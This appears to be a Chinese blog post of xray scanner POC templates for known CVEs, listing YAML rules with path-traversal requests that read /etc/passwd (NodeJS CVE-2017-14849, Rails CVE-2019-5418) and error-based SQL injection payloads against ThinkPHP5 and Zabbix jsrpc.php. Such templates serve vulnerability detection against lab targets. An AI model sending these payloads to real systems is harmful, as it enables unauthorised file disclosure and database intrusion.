zoukankan      html  css  js  c++  java
  • xray写POC踩坑

    错误记录

    NodeJS_path-validation_CVE-2017-14849.yml

    
    name: NodeJS_path-validation_CVE-2017-14849
    rules:
      - method: GET
        path: /static/../../../a/../../../../etc/passwd
        headers:
          Accept: ''
        follow_redirects: false
        expression: |
          status==200 && body.bcontains(b'root:x:0:0')
    detail:
      author: 17bdw
      Affected Version: "NodeJS 8.5.0"
      links:
        - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
    
    

    Rails_file_content_disclosure_CVE-2019-5418

    name: Rails_file_content_disclosure_CVE-2019-5418
    rules:
      - method: GET
        path: /robots
        headers:
          Accept: '../../../../../../../../etc/passwd{{'
        follow_redirects: false
        expression: |
          status==200 && body.bcontains(b'root:x:0:0')
    detail:
      author: 17bdw
      Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
      links:
        - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
    

    thinkphp5-in-sqlinjection

    name: thinkphp5-in-sqlinjection
    rules:
      - method: GET
        path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
        expression: |
          body.bcontains(b'cf79ae6addba60ad018347359bd144d')
    detail:
      author: 17bdw
      Affected Version: "thinkphp5-in-sqlinjection"
      vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
      links:
        - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
    

    zabbix_3.0.3_jsrpc.php_CVE-2016-10134

      
    name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
    rules:
      - method: GET
        path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
        expression: |
          body.bcontains(b'cf79ae6addba60ad018347359bd144d')
    detail:
      author: 17bdw
      Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
      vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
      links:
        - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
    
  • 相关阅读:
    纯win32实现PNG图片透明窗体
    win32用GDI+加载png图片作为背景图
    vc 制作图片资源dll
    wav文件格式分析详解
    VC++ WIN32 sdk实现按钮自绘详解.
    PNG文件结构分析 ---Png解析
    vc/mfc获取rgb图像数据后动态显示及保存图片的方法
    ffmpeg解码流程
    移植ffmpeg到VC环境心得
    Java
  • 原文地址:https://www.cnblogs.com/17bdw/p/11515741.html
Copyright © 2011-2022 走看看